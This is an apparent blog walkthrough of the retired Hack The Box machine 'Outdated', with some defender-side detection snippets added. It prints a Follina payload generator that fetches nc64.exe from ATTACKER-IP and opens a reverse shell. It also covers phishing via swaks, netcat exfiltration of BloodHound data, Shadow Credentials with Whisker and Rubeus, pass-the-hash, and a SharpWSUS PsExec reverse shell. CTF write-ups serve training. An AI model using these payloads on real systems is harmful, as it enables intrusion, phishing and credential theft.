
Outdated (Medium, Windows)


OVERVIEW


ENUMERATION


We are given the target IP, so let's start the enumeration with Nmap.

This time, besides the usual ports, port 25 is open and running an SMTP service, which might give us a lead. Nmap also reveals the domain and the DC name, so don't forget to add them to your /etc/hosts file.

As always, let's start by enumerating SMB with a guest login, since we don't have any user credentials yet:

nxc smb 10.129.229.239 -u guest -p '' --shares

We have READ permission on the Shares share, so let's read it with smbclient:

smbclient //10.129.229.239/Shares -U guest%''

It contains a file called NOC_Reminder.pdf; let's download it and look at its contents.

The PDF gives us an email address, itsupport@outdated.htb, and a list of CVEs to check. Combined with SMTP being open on port 25, this points to phishing. I checked most of the listed CVEs, and the one that works is CVE-2022-30190 (Follina).

In short:
The Follina vulnerability abuses the msdt:// URL protocol handler to achieve code execution. John Hammond's video gave an excellent technical breakdown when the vulnerability was first disclosed. The attack abuses Office documents that contain external references to attacker-controlled HTML files; those HTML files use JavaScript to redirect the victim to a malicious msdt:// URL.

Under normal circumstances the Microsoft Support Diagnostic Tool displays confirmation dialogs that require user interaction. However, researchers discovered that URLs exceeding 4096 bytes bypass these security prompts.
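As a defender-side illustration added here (it is not part of this writeup or of John Hammond's POC), the following Python checker flags HTML of the shape just described: an ms-msdt: URL that suppresses the prompt with /skip force, injects a PowerShell expression through IT_BrowseForFile, and pads the script past 4096 bytes. The two HTML samples are constructed for the example, with the injected command replaced by REDACTED.

```python
import re

# Indicator strings taken from the payload shape described in this writeup.
SKIP_PROMPT = "/skip force"            # suppresses the MSDT confirmation dialog
BROWSE_INJECT = "IT_BrowseForFile=$("  # PowerShell expression smuggled in a parameter
TRAVERSAL = "/../"                     # path traversal towards System32
PROMPT_BYPASS_LEN = 4096               # size above which the prompt is bypassed

# An ms-msdt: URL inside a JS string literal; escaped quotes (\") belong to it.
MSDT_URL_RE = re.compile(r'ms-msdt:(?:\\.|[^"\\])*', re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)


def analyse_html(html: str) -> dict:
    """Return Follina indicators for an HTML body."""
    match = MSDT_URL_RE.search(html)
    if match is None:
        return {"msdt_url": False}
    url = match.group(0)
    script = SCRIPT_RE.search(html)
    script_len = len(script.group(1)) if script else 0
    return {
        "msdt_url": True,
        "skip_force": SKIP_PROMPT in url,
        "browse_injection": BROWSE_INJECT in url,
        "traversal": TRAVERSAL in url,
        "script_over_4096": script_len > PROMPT_BYPASS_LEN,
    }


def verdict(findings: dict) -> str:
    """'clean' without an msdt URL, 'follina-like' with two or more indicators."""
    if not findings["msdt_url"]:
        return "clean"
    keys = ("skip_force", "browse_injection", "traversal", "script_over_4096")
    hits = sum(findings[k] for k in keys)
    return "follina-like" if hits >= 2 else "suspicious"


# Constructed samples (not captured from a real target). The command that the
# writeup's payload carries inside IT_BrowseForFile is replaced by REDACTED.
BENIGN_HTML = '<html><body><a href="https://example.com/NOC_Reminder.pdf">reminder</a></body></html>'
FOLLINA_LIKE_HTML = (
    '<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(REDACTED)'
    'i/../../../../../../Windows/System32/mpsigstub.exe\\""; //'
    + "a" * PROMPT_BYPASS_LEN + "\n</script>"
)
```

A mail gateway or proxy can run analyse_html over fetched HTML attachments and linked pages; anything returning "follina-like" deserves quarantine and review.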

EXPLOITATION


To exploit this vulnerability we will use John Hammond's POC from his GitHub:

CVE-2022-30190

Before using it, a few things had to be worked out:
The typical Follina attack uses Word documents to bypass the security prompts, but that approach needed modification because Word isn't installed on the target. Instead, a standalone HTML page with JavaScript (msdt.html) redirects the victim to the malicious msdt:// URL when they click the link sent to itsupport@outdated.htb.
Testing revealed another complication: the email spam filter blocks URLs ending in .doc, so the traditional payload could not be delivered.
The final payload was adapted from John Hammond's POC, keeping only the HTML generation part and dropping the Word document creation, the web server, and the reverse shell handling, none of which are needed here.

So follina.py looks like this after removing those parts:

  • Don't forget to start a Python web server on port 80 in the folder that contains nc64.exe:

  •   python3 -m http.server 80

  • Don't forget to replace ATTACKER-IP with your IP

#!/usr/bin/env python3

import base64
import random
import string
import sys

if len(sys.argv) > 1:
    command = sys.argv[1]
else:
    command = "IWR http://ATTACKER-IP/nc64.exe -outfile C:\\programdata\\nc64.exe; C:\\programdata\\nc64.exe ATTACKER-IP 443 -e cmd"

base64_payload = base64.b64encode(command.encode("utf-8")).decode("utf-8")

# Slap together a unique MS-MSDT payload that is over 4096 bytes at minimum
html_payload = f"""<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\""; //"""
html_payload += (
    "".join([random.choice(string.ascii_lowercase) for _ in range(4096)])
    + "\n</script>"
)

print(html_payload)

Run it with python3 follina.py and it prints the HTML. Copy that output into a file called msdt.html, and keep msdt.html in the same folder where you started the Python server, next to nc64.exe.

Now open a listener on port 443 in another terminal:

rlwrap nc -lvnp 443

To make the target open msdt.html (and thus the msdt:// URL) we use swaks to send an email to itsupport@outdated.htb.
Be sure to change your IP below:

swaks -t itsupport@outdated.htb -f 0xme0w@reapsec.com --header "Subject: Internal Request" --body "http://YOUR-IP/msdt.html"

The message goes to the SMTP server, which delivers it to itsupport@outdated.htb. The target then requests msdt.html from your Python server, fetches nc64.exe, and we get a foothold on our listener.

We finally have a reverse shell as the user btables; type powershell to enter a PowerShell session.

LATERAL MOVEMENT


After enumerating as btables I didn't find anything useful, so let's look at BloodHound data for more information. Since we don't have valid user credentials, we have to collect it from inside the box with SharpHound.exe, so we import the tool into the shell:

iwr http://YOUR-IP/SharpHound.exe -OutFile SharpHound.exe

Then run it inside the shell:

.\SharpHound.exe -c all

Wait for it to finish. If you remember, we uploaded nc64.exe to C:\programdata\, so we can use it to transfer the BloodHound zip to our local machine:

# In the Windows shell (nc64.exe was uploaded to C:\programdata earlier)
C:\programdata\nc64.exe ATTACKER-IP PORT < 202..........zip
# On the attacker machine
nc -lvnp PORT > 202.............zip

Note: due to some issues I had to reset the machine, so the new machine IP is now 10.129.15.123.

Now let's look at the data in BloodHound.

As you can see, we have the AddKeyCredentialLink permission, so we can perform a Shadow Credentials attack with Whisker.exe.
Import the tool into the shell using the same Invoke-WebRequest method, then run:

.\Whisker.exe add /target:sflowers

We get a certificate along with its password, which we can use to obtain a TGT and the NTLM hash with Rubeus, as shown in the image above.
First import the latest Rubeus.exe into the shell with the same method, then copy the Rubeus command Whisker printed and paste it. If it errors, paste it into a text editor first and remove the extra spaces so it pastes cleanly, or just use AI to fix the format ;)

Now run the command; since Rubeus is in the current folder, don't forget to prefix the copied command with .\

USER FLAG

We now have the NTLM hash of the user sflowers, so let's log in with it using evil-winrm:

evil-winrm -i 10.129.15.123 -u sflowers -H HASH

And you get the user flag.

PRIVILEGE ESCALATION


Let's enumerate further for privilege escalation. Looking at the groups with whoami /all:

We notice that sflowers is a member of the WSUS Administrators group, which seems suspicious, so I ran winPEAS.exe to find anything extra.

Running winPEAS.exe, I found:

Researching how to exploit WSUS (Windows Server Update Services), I found this BLOG.

The blog explains what WSUS is and how it works:
→ Windows Server Update Services (WSUS) is a centralized patch management system that downloads Microsoft updates once and distributes them to all Windows computers in a corporate network, so that individual machines don't need to reach the internet directly.

The vulnerability arises when an attacker compromises the WSUS server with administrative privileges. WSUS only accepts Microsoft-signed binaries as payloads (such as PsExec.exe or PowerShell.exe), but an attacker can abuse those legitimate tools by controlling the arguments passed to them.

For example, SharpWSUS can create a malicious "update" that uses the legitimate, signed PsExec.exe binary but passes malicious commands as arguments, such as creating administrator accounts or launching reverse shells.
Since WSUS talks to nearly every computer in the network, this bypasses network segmentation and allows lateral movement to otherwise isolated systems, including Domain Controllers.

The main limitation is that attackers must wait for target machines to check for updates, which can take minutes, hours, days, or weeks depending on the organization's patch deployment schedule.
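As an added defender-side example (not from this writeup or the SharpWSUS project), this Python review helper scores a WSUS update entry the way the passage above describes the abuse: a signed, legitimate payload combined with attacker-controlled arguments. The record schema and both sample entries are assumed and constructed; the rogue one mirrors the PsExec-plus-nc64 command shape used later in this writeup, with a constructed IP.

```python
import re
from typing import List, NamedTuple


class UpdateEntry(NamedTuple):
    """Assumed schema: the fields SharpWSUS's create command sets on an update."""
    title: str
    payload: str  # binary WSUS will run; must be Microsoft-signed
    args: str     # arguments passed to that binary, which WSUS does not verify


# Signed Microsoft binaries that execute whatever their arguments tell them to.
LOLBIN_PAYLOADS = {"psexec.exe", "psexec64.exe", "powershell.exe", "cmd.exe"}

# Argument patterns from the technique described above: PsExec run as SYSTEM,
# a shell spawned via -e, account creation, raw IPs, binaries in writable paths.
ARG_PATTERNS = {
    "non-interactive PsExec (-accepteula)": re.compile(r"-accepteula\b", re.I),
    "runs as SYSTEM (-s)": re.compile(r"(^|\s)-s(\s|$)", re.I),
    "spawns cmd via -e": re.compile(r"\s-e\s+cmd(\.exe)?\b", re.I),
    "account creation": re.compile(r"\bnet\s+user\b.*\s/add\b", re.I),
    "raw IP address in arguments": re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b"),
    "executable under a user-writable path": re.compile(
        r"[\\/](?:Users|ProgramData|Temp)[\\/]\S*\.exe", re.I),
}


def assess_update(entry: UpdateEntry) -> List[str]:
    """Return human-readable reasons why an update entry looks like SharpWSUS abuse."""
    reasons = []
    basename = entry.payload.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if basename in LOLBIN_PAYLOADS:
        reasons.append(f"payload is a living-off-the-land binary ({basename})")
    for label, pattern in ARG_PATTERNS.items():
        if pattern.search(entry.args):
            reasons.append(label)
    return reasons


def is_suspicious(entry: UpdateEntry) -> bool:
    """A signed tool plus any hostile argument, or several hostile arguments, is enough."""
    reasons = assess_update(entry)
    lolbin = any(r.startswith("payload is") for r in reasons)
    return (lolbin and len(reasons) >= 2) or len(reasons) >= 3


# Constructed sample entries; KB and IP values are placeholders, not real data.
BENIGN_UPDATE = UpdateEntry("2024-05 Security Update (KB-PLACEHOLDER)", "windows-kb-placeholder.cab", "")
ROGUE_UPDATE = UpdateEntry("MEOWTAKEOVER", r"C:\Users\sflowers\Desktop\PsExec64.exe",
                           "-accepteula -s -d C:/Users/sflowers/Desktop/nc64.exe -e cmd 10.10.14.5 9002")
```

Reviewing pending approvals with a check like this, together with alerting on membership changes to WSUS Administrators, catches the abuse during the window before clients poll for updates.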

Let's use SharpWSUS.exe to exploit this and get a reverse shell. If you remember, we already have PsExec64.exe in C:\Users\sflowers\Desktop\:

.\SharpWSUS.exe create /payload:"C:\Users\sflowers\Desktop\PsExec64.exe" /args:"-accepteula -s -d C:/Users/sflowers/Desktop/nc64.exe -e cmd YOUR-IP 9002" /title:"MEOWTAKEOVER"

The update is created and we get an updateid; copy it, as the following commands need it.

Open a listener on port 9002 in our terminal before approving the update:

rlwrap nc -lvnp 9002

Now approve the update so it gets installed on the client system:

SharpWSUS.exe approve /updateid:YOUR-UPDATE-ID /computername:dc.outdated.htb /groupname:"MEOWTAKEOVER"

Wait a while for the update to be installed. In the meantime you can use the check command to see whether it has been installed yet:

SharpWSUS.exe check /updateid:YOUR-UPDATE-ID /computername:dc.outdated.htb /groupname:"MEOWTAKEOVER"

I ran the command after some time and it showed installed; then check your listener.


ROOT FLAG

You are now root and can grab the root flag!

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For any query or problem, either leave a comment or contact me at reapsec.com.

THANKS FOR READING !!!

HTB MACHINES (Part 1 of 9)

In this series I will provide full walkthroughs of retired machines on Hack The Box!